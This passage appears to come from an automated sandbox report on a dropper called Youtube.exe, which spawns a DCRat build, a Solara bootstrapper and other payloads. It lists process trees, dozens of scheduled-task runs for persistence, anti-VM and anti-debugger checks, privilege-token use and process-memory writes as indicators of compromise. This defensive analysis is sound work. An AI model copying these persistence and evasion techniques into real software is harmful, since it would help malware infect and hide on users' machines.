Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings	solara.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 886242.crdownload:SmartScreen	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 37 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1384	schtasks.exe
2800	schtasks.exe
988	schtasks.exe
1080	schtasks.exe
3948	schtasks.exe
4116	schtasks.exe
2844	schtasks.exe
5272	schtasks.exe
2276	schtasks.exe
2320	schtasks.exe
3352	schtasks.exe
5996	schtasks.exe
5152	schtasks.exe
1916	schtasks.exe
2556	schtasks.exe
4464	schtasks.exe
4568	schtasks.exe
6116	schtasks.exe
236	schtasks.exe
2020	schtasks.exe
5004	schtasks.exe
4832	schtasks.exe
2476	schtasks.exe
4520	schtasks.exe
1440	schtasks.exe
688	schtasks.exe
2180	schtasks.exe
848	schtasks.exe
2788	schtasks.exe
4864	schtasks.exe
3360	schtasks.exe
3740	schtasks.exe
1712	schtasks.exe
3572	schtasks.exe
4632	schtasks.exe
2064	schtasks.exe
2692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4884	SolaraBootstrapper.exe
4884	SolaraBootstrapper.exe
2944	Refcrt.exe
2944	Refcrt.exe
2944	Refcrt.exe
2944	Refcrt.exe
1260	powershell.exe
1260	powershell.exe
1880	powershell.exe
1880	powershell.exe
1528	powershell.exe
1528	powershell.exe
2232	powershell.exe
2232	powershell.exe
4504	powershell.exe
4504	powershell.exe
5072	powershell.exe
5072	powershell.exe
5016	powershell.exe
5016	powershell.exe
2588	powershell.exe
2588	powershell.exe
2240	powershell.exe
2240	powershell.exe
5108	powershell.exe
5108	powershell.exe
4860	powershell.exe
4860	powershell.exe
4504	powershell.exe
2240	powershell.exe
988	Registry.exe
988	Registry.exe
1260	powershell.exe
1528	powershell.exe
5072	powershell.exe
2232	powershell.exe
1880	powershell.exe
5016	powershell.exe
2588	powershell.exe
4860	powershell.exe
5108	powershell.exe
988	Registry.exe
2244	msiexec.exe
2244	msiexec.exe
5868	conhost.exe
5964	powershell.exe
5964	powershell.exe
5964	powershell.exe
776	powershell.exe
776	powershell.exe
776	powershell.exe
988	Registry.exe
988	Registry.exe
988	Registry.exe
988	Registry.exe
988	Registry.exe
988	Registry.exe
988	Registry.exe
988	Registry.exe
5180	ComContainerbrowserRefRuntime.exe
5180	ComContainerbrowserRefRuntime.exe
5180	ComContainerbrowserRefRuntime.exe
5180	ComContainerbrowserRefRuntime.exe
5180	ComContainerbrowserRefRuntime.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
988	Registry.exe
5764	conhost.exe
5744	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
5676	msedge.exe
5676	msedge.exe
5772	msedgewebview2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4884	SolaraBootstrapper.exe
Token: SeDebugPrivilege	2944	Refcrt.exe
Token: SeShutdownPrivilege	276	msiexec.exe
Token: SeIncreaseQuotaPrivilege	276	msiexec.exe
Token: SeSecurityPrivilege	2244	msiexec.exe
Token: SeCreateTokenPrivilege	276	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	276	msiexec.exe
Token: SeLockMemoryPrivilege	276	msiexec.exe
Token: SeIncreaseQuotaPrivilege	276	msiexec.exe
Token: SeMachineAccountPrivilege	276	msiexec.exe
Token: SeTcbPrivilege	276	msiexec.exe
Token: SeSecurityPrivilege	276	msiexec.exe
Token: SeTakeOwnershipPrivilege	276	msiexec.exe
Token: SeLoadDriverPrivilege	276	msiexec.exe
Token: SeSystemProfilePrivilege	276	msiexec.exe
Token: SeSystemtimePrivilege	276	msiexec.exe
Token: SeProfSingleProcessPrivilege	276	msiexec.exe
Token: SeIncBasePriorityPrivilege	276	msiexec.exe
Token: SeCreatePagefilePrivilege	276	msiexec.exe
Token: SeCreatePermanentPrivilege	276	msiexec.exe
Token: SeBackupPrivilege	276	msiexec.exe
Token: SeRestorePrivilege	276	msiexec.exe
Token: SeShutdownPrivilege	276	msiexec.exe
Token: SeDebugPrivilege	276	msiexec.exe
Token: SeAuditPrivilege	276	msiexec.exe
Token: SeSystemEnvironmentPrivilege	276	msiexec.exe
Token: SeChangeNotifyPrivilege	276	msiexec.exe
Token: SeRemoteShutdownPrivilege	276	msiexec.exe
Token: SeUndockPrivilege	276	msiexec.exe
Token: SeSyncAgentPrivilege	276	msiexec.exe
Token: SeEnableDelegationPrivilege	276	msiexec.exe
Token: SeManageVolumePrivilege	276	msiexec.exe
Token: SeImpersonatePrivilege	276	msiexec.exe
Token: SeCreateGlobalPrivilege	276	msiexec.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	988	Registry.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeRestorePrivilege	2244	msiexec.exe
Token: SeTakeOwnershipPrivilege	2244	msiexec.exe
Token: SeDebugPrivilege	5868	conhost.exe
Token: SeDebugPrivilege	5964	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	5180	ComContainerbrowserRefRuntime.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3440 wrote to memory of 4352	3440	Youtube.exe	82
PID 3440 wrote to memory of 4352	3440	Youtube.exe	82
PID 3440 wrote to memory of 4352	3440	Youtube.exe	82
PID 3440 wrote to memory of 2756	3440	Youtube.exe	83
PID 3440 wrote to memory of 2756	3440	Youtube.exe	83
PID 3440 wrote to memory of 2756	3440	Youtube.exe	83
PID 3440 wrote to memory of 976	3440	Youtube.exe	84
PID 3440 wrote to memory of 976	3440	Youtube.exe	84
PID 3440 wrote to memory of 1592	3440	Youtube.exe	85
PID 3440 wrote to memory of 1592	3440	Youtube.exe	85
PID 3440 wrote to memory of 1592	3440	Youtube.exe	85
PID 4352 wrote to memory of 4884	4352	Result.exe	86
PID 4352 wrote to memory of 4884	4352	Result.exe	86
PID 4352 wrote to memory of 4884	4352	Result.exe	86
PID 2756 wrote to memory of 4576	2756	DCRatBuild.exe	88
PID 2756 wrote to memory of 4576	2756	DCRatBuild.exe	88
PID 2756 wrote to memory of 4576	2756	DCRatBuild.exe	88
PID 1592 wrote to memory of 1236	1592	Frage build.exe	89
PID 1592 wrote to memory of 1236	1592	Frage build.exe	89
PID 1592 wrote to memory of 1236	1592	Frage build.exe	89
PID 4352 wrote to memory of 2680	4352	Result.exe	90
PID 4352 wrote to memory of 2680	4352	Result.exe	90
PID 4352 wrote to memory of 2680	4352	Result.exe	90
PID 2680 wrote to memory of 2948	2680	solara.exe	91
PID 2680 wrote to memory of 2948	2680	solara.exe	91
PID 2680 wrote to memory of 2948	2680	solara.exe	91
PID 2948 wrote to memory of 4192	2948	WScript.exe	92
PID 2948 wrote to memory of 4192	2948	WScript.exe	92
PID 2948 wrote to memory of 4192	2948	WScript.exe	92
PID 4192 wrote to memory of 2944	4192	cmd.exe	94
PID 4192 wrote to memory of 2944	4192	cmd.exe	94
PID 4884 wrote to memory of 276	4884	SolaraBootstrapper.exe	119
PID 4884 wrote to memory of 276	4884	SolaraBootstrapper.exe	119
PID 4884 wrote to memory of 276	4884	SolaraBootstrapper.exe	119
PID 2944 wrote to memory of 1880	2944	Refcrt.exe	129
PID 2944 wrote to memory of 1880	2944	Refcrt.exe	129
PID 2944 wrote to memory of 1260	2944	Refcrt.exe	130
PID 2944 wrote to memory of 1260	2944	Refcrt.exe	130
PID 2944 wrote to memory of 5072	2944	Refcrt.exe	131
PID 2944 wrote to memory of 5072	2944	Refcrt.exe	131
PID 2944 wrote to memory of 2588	2944	Refcrt.exe	132
PID 2944 wrote to memory of 2588	2944	Refcrt.exe	132
PID 2944 wrote to memory of 5016	2944	Refcrt.exe	133
PID 2944 wrote to memory of 5016	2944	Refcrt.exe	133
PID 2944 wrote to memory of 1528	2944	Refcrt.exe	134
PID 2944 wrote to memory of 1528	2944	Refcrt.exe	134
PID 2944 wrote to memory of 2232	2944	Refcrt.exe	135
PID 2944 wrote to memory of 2232	2944	Refcrt.exe	135
PID 2944 wrote to memory of 4504	2944	Refcrt.exe	136
PID 2944 wrote to memory of 4504	2944	Refcrt.exe	136
PID 2944 wrote to memory of 4860	2944	Refcrt.exe	137
PID 2944 wrote to memory of 4860	2944	Refcrt.exe	137
PID 2944 wrote to memory of 5108	2944	Refcrt.exe	138
PID 2944 wrote to memory of 5108	2944	Refcrt.exe	138
PID 2944 wrote to memory of 2240	2944	Refcrt.exe	139
PID 2944 wrote to memory of 2240	2944	Refcrt.exe	139
PID 2944 wrote to memory of 988	2944	Refcrt.exe	151
PID 2944 wrote to memory of 988	2944	Refcrt.exe	151
PID 2244 wrote to memory of 5196	2244	msiexec.exe	154
PID 2244 wrote to memory of 5196	2244	msiexec.exe	154
PID 2244 wrote to memory of 5364	2244	msiexec.exe	155
PID 2244 wrote to memory of 5364	2244	msiexec.exe	155
PID 2244 wrote to memory of 5364	2244	msiexec.exe	155
PID 976 wrote to memory of 5868	976	Bloxstrap.exe	160

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Youtube.exe
"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3440
- C:\Users\Admin\AppData\Local\Temp\Result.exe
  "C:\Users\Admin\AppData\Local\Temp\Result.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\SysWOW64\msiexec.exe
      "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:276
  - - C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
      "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
      4⤵
      Executes dropped EXE
      PID:5808
    - - C:\Windows\Temp\{364DCF21-CB4A-412B-A23B-C423CF6B2422}\.cr\vc_redist.x64.exe
        
        "C:\Windows\Temp\{364DCF21-CB4A-412B-A23B-C423CF6B2422}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=564 -burn.filehandle.self=688 /install /quiet /norestart
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
      4⤵
      Enumerates system info in registry
      NTFS ADS
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe98b73cb8,0x7ffe98b73cc8,0x7ffe98b73cd8
        5⤵
        
        PID:5388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1860 /prefetch:2
        5⤵
        
        PID:2792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1920 /prefetch:3
        5⤵
        
        PID:4312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
        5⤵
        
        PID:2800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
        5⤵
        
        PID:2232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        5⤵
        
        PID:6068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5188 /prefetch:8
        5⤵
        
        PID:4016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
        5⤵
        
        PID:5256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5840 /prefetch:8
        5⤵
        
        PID:1912
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5628 /prefetch:2
        5⤵
        
        PID:4380
  - - C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3372
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3372.1692.6477468741360226681
        5⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5772
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1fc,0x7ffe98b73cb8,0x7ffe98b73cc8,0x7ffe98b73cd8
        6⤵
        
        PID:5644
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1956 /prefetch:2
        6⤵
        
        PID:4060
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2004 /prefetch:3
        6⤵
        
        PID:2500
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2420 /prefetch:8
        6⤵
        
        PID:4148
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
        6⤵
        
        PID:1848
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
